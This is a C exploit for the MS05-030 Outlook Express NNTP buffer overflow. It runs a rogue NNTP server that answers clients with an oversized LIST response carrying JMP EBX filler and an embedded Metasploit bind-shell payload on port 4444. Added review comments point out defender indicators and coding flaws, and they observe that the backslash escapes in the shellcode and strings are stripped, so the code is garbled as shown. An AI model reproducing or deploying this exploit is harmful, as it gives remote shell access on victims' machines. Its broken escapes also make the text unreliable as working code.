# Title : MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)
# Published : 2005-06-24
# Author : eyas
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32")
/* win32_bind - EXITFUNC=process LPORT=4444 Size=344
Encoder=PexFnstenvSub http://metasploit.com */
/* Payload appended verbatim to the oversized response that main() builds
 * (see the strcat of scode there). According to the generator comment above
 * it is a bind shell on TCP 4444, so from a monitoring standpoint a client
 * host that opens a listener on 4444 right after an NNTP session is the
 * post-exploitation indicator; the fix is the MS05-030 update named in the
 * title.
 *
 * NOTE(review): as rendered on this page the literal reads "x31xc9..."
 * rather than "\x31\xc9..." - the backslashes appear to have been stripped
 * by the page extraction, so this array is plain ASCII text here, not the
 * 344 bytes the generator comment describes. */
unsigned char scode[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x96"
"x27xc8x3ex83xebxfcxe2xf4x6ax4dx23x73x7exdex37xc1"
"x69x47x43x52xb2x03x43x7bxaaxacxb4x3bxeex26x27xb5"
"xd9x3fx43x61xb6x26x23x77x1dx13x43x3fx78x16x08xa7"
"x3axa3x08x4ax91xe6x02x33x97xe5x23xcaxadx73xecx16"
"xe3xc2x43x61xb2x26x23x58x1dx2bx83xb5xc9x3bxc9xd5"
"x95x0bx43xb7xfax03xd4x5fx55x16x13x5ax1dx64xf8xb5"
"xd6x2bx43x4ex8ax8ax43x7ex9ex79xa0xb0xd8x29x24x6e"
"x69xf1xaex6dxf0x4fxfbx0cxfex50xbbx0cxc9x73x37xee"
"xfexecx25xc2xadx77x37xe8xc9xaex2dx58x17xcaxc0x3c"
"xc3x4dxcaxc1x46x4fx11x37x63x8ax9fxc1x40x74x9bx6d"
"xc5x74x8bx6dxd5x74x37xeexf0x4fxd9x62xf0x74x41xdf"
"x03x4fx6cx24xe6xe0x9fxc1x40x4dxd8x6fxc3xd8x18x56"
"x32x8axe6xd7xc1xd8x1ex6dxc3xd8x18x56x73x6ex4ex77"
"xc1xd8x1ex6exc2x73x9dxc1x46xb4xa0xd9xefxe1xb1x69"
"x69xf1x9dxc1x46x41xa2x5axf0x4fxabx53x1fxc2xa2x6e"
"xcfx0ex04xb7x71x4dx8cxb7x74x16x08xcdx3cxd9x8ax13"
"x68x65xe4xadx1bx5dxf0x95x3dx8cxa0x4cx68x94xdexc1"
"xe3x63x37xe8xcdx70x9ax6fxc7x76xa2x3fxc7x76x9dx6f"
"x69xf7xa0x93x4fx22x06x6dx69xf1xa2xc1x69x10x37xee"
"x1dx70x34xbdx52x43x37xe8xc4xd8x18x56xe8xffx2ax4d"
"xc5xd8x1exc1x46x27xc8x3e";
/* Target table, indexed by argv[1] in main(). dwJMPEBX is the 4-byte value
 * that main() memcpy()s into the repeated 8-byte filler; szDescription is
 * what usage() prints next to the index. There is exactly one entry, so 0
 * is the only valid index - main() does not range-check the value before
 * indexing. `v` is a dummy instance of the anonymous struct type; usage()
 * divides sizeof(targets) by sizeof(v) to get the entry count. */
struct
{
DWORD dwJMPEBX;
char *szDescription;
}targets[] =
{
{0x7803382b, "win2k sp4 all language"}
},v;
/* Print the command-line synopsis followed by the numbered target table.
 * p: program name (argv[0]) shown in the synopsis. Writes to stdout only.
 * (The "n" at the end of each literal is a newline escape whose backslash
 * appears to have been lost in this rendering.) */
void usage(char *p)
{
    size_t count = sizeof(targets) / sizeof(v);
    size_t idx = 0;

    printf( "Usage: %s <type>n"
    "[type]n", p);

    while (idx < count)
    {
        printf("%dt%sn", (int)idx, targets[idx].szDescription);
        idx++;
    }
}
/* Entry point: runs a rogue NNTP server on TCP 119 and answers every client
 * that connects with the same oversized "215 list" response built below.
 * argv[1] selects the entry of targets[] (see usage()). Never returns on
 * the normal path because the accept loop has no exit; `void main` is also
 * non-standard (should be `int main`).
 *
 * Defender's view: the observable artefacts are an unexpected listener on
 * 119, a canned "200" greeting sent before the client says anything, and a
 * LIST response whose group line runs to thousands of bytes. The mitigation
 * is the MS05-030 update named in the title.
 *
 * NOTE(review): escapes throughout ("n", "rn", 'x0', the quotes around LIST
 * in the banner) appear to have lost their backslashes in this rendering;
 * e.g. the banner literal on the first printf is split by a bare LIST token
 * as shown here. The code is left byte-identical to the page. */
void main(int argc, char **argv)
{
struct sockaddr_in server,client;
WSADATA wsd;
SOCKET s2,s3;
int ret;
char szRecvBuff[0x100];
char szSend[] = "200rn";  /* greeting / generic OK line reused for both replies */
int i,iType;
char szEvil[0x3000], szTmp[0x10];
printf( "MS OE NNTP "LIST" Buffer Overflow (MS05-030) EXPn"
"Credits: Bug found by iDEFENSEn"
"coded by eyas < eyas at xfocus.org>n"
"http://www.xfocus.netnn");
if(argc!=2)
{
usage(argv[0]);
return;
}
/* No range check: targets[] has a single entry, so anything but 0 reads
 * past the array at the memcpy below. atoi() also reports no parse error;
 * strtol() with an endptr check would be the robust form. */
iType = atoi(argv[1]);
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%dn", WSAGetLastError());
return;
}
/* socket()/bind()/listen() results are never checked - ret is assigned
 * twice and then ignored, so a failed bind (e.g. port 119 already in use)
 * still prints "Listen on TCP 119" and falls into the accept loop. */
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(119);
server.sin_addr.s_addr= 0;  /* 0 == INADDR_ANY: binds every interface */
ret = bind(s2, (struct sockaddr *)&server, sizeof(server));
ret = listen(s2, 100);
printf("[+] Listen on TCP 119.n");
/* Infinite serve loop; there is no break, so WSACleanup() below is
 * unreachable and the process only ends when killed. */
while(1)
{
ret=sizeof(client);
s3 = accept(s2, (struct sockaddr *)&client, &ret);  /* INVALID_SOCKET not checked */
printf("[+] Connection accepted from %s:%dn",
inet_ntoa(client.sin_addr), ntohs(client.sin_port));
printf("[+] Send welcome information.n");
send(s3, szSend, strlen(szSend), 0);
/* recv() may return 0 (peer closed) or SOCKET_ERROR (-1); ret-1 is then
 * negative and the store below writes before the start of szRecvBuff. */
ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-1] = 'x0';
printf("[+] Recv: [%s]n", szRecvBuff);
send(s3, szSend, strlen(szSend), 0);
printf("[+] Send response.n");
/* Same hazard as above, worse: any ret < 4 (including a short legitimate
 * read) indexes before the buffer. */
ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-4] = 'x0';
printf("[+] Recv: [%s]n", szRecvBuff);
printf("[+] send evil buff.n");
/* szTmp becomes an 8-byte unit: 4 literal bytes, then the 4-byte
 * targets[iType].dwJMPEBX, then a NUL at [8]. */
strcpy(szTmp, "xEBx06xEBx06");
memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);
szTmp[8]='x0';
/* Response starts with the NNTP LIST status line (215) and a group line
 * whose name is then padded far beyond what the client expects. */
strcpy(szEvil, "215 listrngroup aaaa");
//for(i=0;i<0x2598;i++)
//for(i=0;i<0x30;i++)
/* Appends szTmp once per 8 bytes of the 0x2798-byte filler, then the
 * payload, then the line/response terminator. Nothing compares the running
 * length against sizeof(szEvil) (0x3000); the sizes happen to fit, but a
 * change to the loop bound or payload length would overflow this local
 * buffer silently. */
for(i=0;i<0x2598+0x200;i+=8)
strcat(szEvil, szTmp);
strcat(szEvil, (char *)scode);
strcat(szEvil, " 1 yrn.rn");  /* "." on its own line ends an NNTP multi-line response */
send(s3, szEvil, strlen(szEvil), 0);  /* return value / partial send not checked */
Sleep(1000);  /* presumably lets the peer read before the close - not verified */
closesocket(s3);
printf("[+] close connectionn");
}
WSACleanup();  /* unreachable: the loop above never exits */
return;
}